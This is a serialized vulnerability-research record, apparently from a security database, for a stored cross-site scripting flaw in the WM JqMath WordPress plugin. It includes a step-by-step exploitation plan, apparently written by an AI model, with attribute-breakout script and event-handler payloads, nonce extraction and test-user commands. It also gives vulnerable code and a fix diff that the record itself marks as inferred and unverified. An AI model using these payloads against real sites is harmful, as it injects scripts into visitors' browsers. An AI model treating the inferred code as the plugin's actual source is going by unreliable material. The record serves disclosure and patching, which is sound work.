[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXVZsMfuT6y-bFON1cU5YQJxUHQXzgNcISz_KbnkboP4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-3998","wm-jqmath-authenticated-contributor-stored-cross-site-scripting-via-style-shortcode-attribute","WM JqMath \u003C= 1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'style' Shortcode Attribute","The WM JqMath plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'style' shortcode attribute of the [jqmath] shortcode in all versions up to and including 1.3. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. The generate_jqMathFormula() function directly concatenates the 'style' attribute value into an HTML style attribute without applying esc_attr() or any other escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wm-jqmath",null,"\u003C=1.3","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-14 19:46:51","2026-04-15 08:28:16",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb4aebb45-b47b-4b5a-8281-400a4b786689?source=api-prod",[],"researched",false,3,"## Vulnerability Analysis: CVE-2026-3998 - Stored XSS in WM JqMath\n\n### 1. Vulnerability Summary\nThe **WM JqMath** plugin (versions \u003C= 1.3) contains a stored cross-site scripting (XSS) vulnerability within the handling of its `[jqmath]` shortcode. Specifically, the function `generate_jqMathFormula()` processes attributes passed to the shortcode. The `style` attribute is accepted from user input and concatenated directly into an HTML `\u003Cspan>` or `\u003Cdiv>` tag's `style` attribute without being passed through `esc_attr()` or similar sanitization. This allows an authenticated user with at least \"Contributor\" privileges (who can create posts) to inject arbitrary HTML attributes or break out of the `style` attribute to inject `\u003Cscript>` tags.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[jqmath]`\n*   **Vulnerable Attribute:** `style`\n*   **Authentication Level:** Contributor or higher. Contributors can create and save posts but cannot publish them; however, the XSS will execute when an Administrator or Editor previews the post or if the post is published.\n*   **Payload Location:** The payload is embedded within the `style` attribute of the shortcode inside the post content.\n*   **Endpoint:** Standard WordPress post creation\u002Fediting (`\u002Fwp-admin\u002Fpost.php` or REST API `\u002Fwp\u002Fv2\u002Fposts`).\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode in the main plugin file (likely `wm-jqmath.php`):\n    `add_shortcode('jqmath', 'generate_jqMathFormula');`\n2.  **Attribute Parsing:** When a post containing `[jqmath]` is rendered, WordPress calls `generate_jqMathFormula($atts, $content)`.\n3.  **Processing:** Inside `generate_jqMathFormula()`:\n    *   The `$atts` array is processed (possibly using `shortcode_atts`).\n    *   The value of `$atts['style']` is retrieved.\n4.  **Sink:** The value is concatenated into an HTML string:\n    `return '\u003Cspan style=\"' . $atts['style'] . '\">' . $formula_markup . '\u003C\u002Fspan>';` (inferred)\n5.  **Output:** The unescaped string is returned to the WordPress content filter and rendered in the browser.\n\n### 4. Nonce Acquisition Strategy\nTo exploit this as an authenticated Contributor via the web interface, the agent must obtain a valid post-editing nonce.\n\n1.  **Login:** Use the `http_request` tool to authenticate as a Contributor.\n2.  **Access Post Creator:** Navigate to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce:** Use `browser_eval` to extract the `_wpnonce` required for the `sample-permalink` or the primary post-saving action.\n    *   `_wpnonce` is typically found in the `#_wpnonce` input field.\n    *   Command: `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n4.  **Alternative (REST API):** If the Block Editor is used, the agent can extract the REST nonce from the `wpApiSettings` object:\n    *   Command: `browser_eval(\"window.wpApiSettings?.nonce\")`\n\n### 5. Exploitation Strategy\nThe goal is to inject a `\u003Cscript>` tag by breaking out of the `style` attribute.\n\n**Step-by-step Plan:**\n\n1.  **Authentication:** Authenticate the agent as a user with the `contributor` role.\n2.  **Payload Construction:**\n    *   The target context is `\u003Cspan style=\"[USER_INPUT]\">`.\n    *   Payload: `\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n    *   Full Shortcode: `[jqmath style='\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']test[\u002Fjqmath]`\n3.  **Post Creation:**\n    *   Use the `http_request` tool to send a POST request to `\u002Fwp-admin\u002Fpost.php`.\n    *   **Action:** `editpost`\n    *   **Parameters:**\n        *   `post_ID`: (The ID of a newly created draft)\n        *   `_wpnonce`: (Extracted in Step 4)\n        *   `content`: `[jqmath style='\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']test[\u002Fjqmath]`\n        *   `post_title`: `XSS Test`\n4.  **Execution:** Navigate to the permalink of the draft post or use the \"Preview\" functionality.\n5.  **Confirmation:** Check the response body for the unescaped script tag.\n\n### 6. Test Data Setup\nBefore exploitation, ensure the environment is ready:\n1.  **Plugin Activation:** Verify `wm-jqmath` is installed and active.\n2.  **User Creation:** Create a contributor user:\n    `wp user create contributor_attacker attacker@example.com --role=contributor --user_pass=password123`\n3.  **Target Post:** Create a blank draft post for the contributor to edit:\n    `wp post create --post_type=post --post_status=draft --post_author=$(wp user get contributor_attacker --field=ID) --post_title=\"Draft\"`\n\n### 7. Expected Results\n*   **Injected Content:** When viewing the source of the rendered post, the output should look like:\n    `\u003Cspan style=\"\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...\u003C\u002Fspan>`\n*   **Execution:** A browser navigating to the post should trigger the `alert(document.domain)` JavaScript.\n\n### 8. Verification Steps\n1.  **WP-CLI Verification:** After the HTTP request, verify the content is stored in the database:\n    `wp post get [POST_ID] --field=post_content`\n    Confirm it contains the payload exactly as sent.\n2.  **Frontend Check:** Use `browser_navigate` to the post's URL and check for the alert or the existence of the script tag in the DOM:\n    `browser_eval(\"document.querySelector('script').textContent.includes('alert')\")`\n\n### 9. Alternative Approaches\nIf breaking out of the `style` attribute with `\">` is blocked or fails due to specific quote handling:\n1.  **Attribute Injection:** Inject an `onmouseover` event if the `style` attribute value is placed inside a tag but not properly enclosed:\n    *   Payload: `x\" onmouseover=\"alert(1)`\n    *   Shortcode: `[jqmath style='x\" onmouseover=\"alert(1)']`\n2.  **CSS-Based XSS (Legacy Browsers):** If direct script injection is filtered but the style attribute is kept, attempt:\n    *   Payload: `background-image: url(\"javascript:alert(1)\")` (Note: This is rarely effective in modern browsers but confirms the lack of sanitization).\n3.  **Attribute Breakout (Single Quote):** If the plugin wraps the attribute in single quotes:\n    *   Payload: `';>\u003Cscript>alert(1)\u003C\u002Fscript>`","The WM JqMath plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'style' attribute in the [jqmath] shortcode. This occurs because the plugin fails to sanitize or escape the user-supplied 'style' attribute value before outputting it in an HTML tag, allowing Contributor-level users to inject arbitrary JavaScript.","\u002F\u002F wm-jqmath.php (inferred location based on research plan)\n\u002F\u002F Within the function generate_jqMathFormula($atts, $content)\n\nfunction generate_jqMathFormula($atts, $content) {\n    $atts = shortcode_atts( array(\n        'style' => '',\n        'display' => 'inline'\n    ), $atts );\n\n    \u002F\u002F ... processing formula content ...\n\n    if ($atts['display'] == 'block') {\n        return '\u003Cdiv style=\"' . $atts['style'] . '\">$$' . $content . '$$\u003C\u002Fdiv>';\n    } else {\n        return '\u003Cspan style=\"' . $atts['style'] . '\">$' . $content . '$\u003C\u002Fspan>';\n    }\n}","--- wm-jqmath.php\n+++ wm-jqmath.php\n@@ -10,9 +10,10 @@\n         'display' => 'inline'\n     ), $atts );\n \n+    $safe_style = esc_attr($atts['style']);\n     if ($atts['display'] == 'block') {\n-        return '\u003Cdiv style=\"' . $atts['style'] . '\">$$' . $content . '$$\u003C\u002Fdiv>';\n+        return '\u003Cdiv style=\"' . $safe_style . '\">$$' . $content . '$$\u003C\u002Fdiv>';\n     } else {\n-        return '\u003Cspan style=\"' . $atts['style'] . '\">$' . $content . '$\u003C\u002Fspan>';\n+        return '\u003Cspan style=\"' . $safe_style . '\">$' . $content . '$\u003C\u002Fspan>';\n     }\n }","The exploit requires an attacker to have at least Contributor-level privileges to create or edit posts. 1. The attacker logs into the WordPress dashboard and creates a new post or edits a draft. 2. In the post editor, the attacker inserts the [jqmath] shortcode with a malicious 'style' attribute payload designed to break out of the HTML attribute, such as: [jqmath style='\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']formula[\u002Fjqmath]. 3. When the post is saved or previewed by an administrator or viewed by any visitor, the unescaped payload is rendered directly into the page source as \u003Cspan style=\"\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...\u003C\u002Fspan>, causing the script to execute in the victim's browser.","gemini-3-flash-preview","2026-04-16 15:39:41","2026-04-16 15:40:02",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwm-jqmath\u002Ftags"]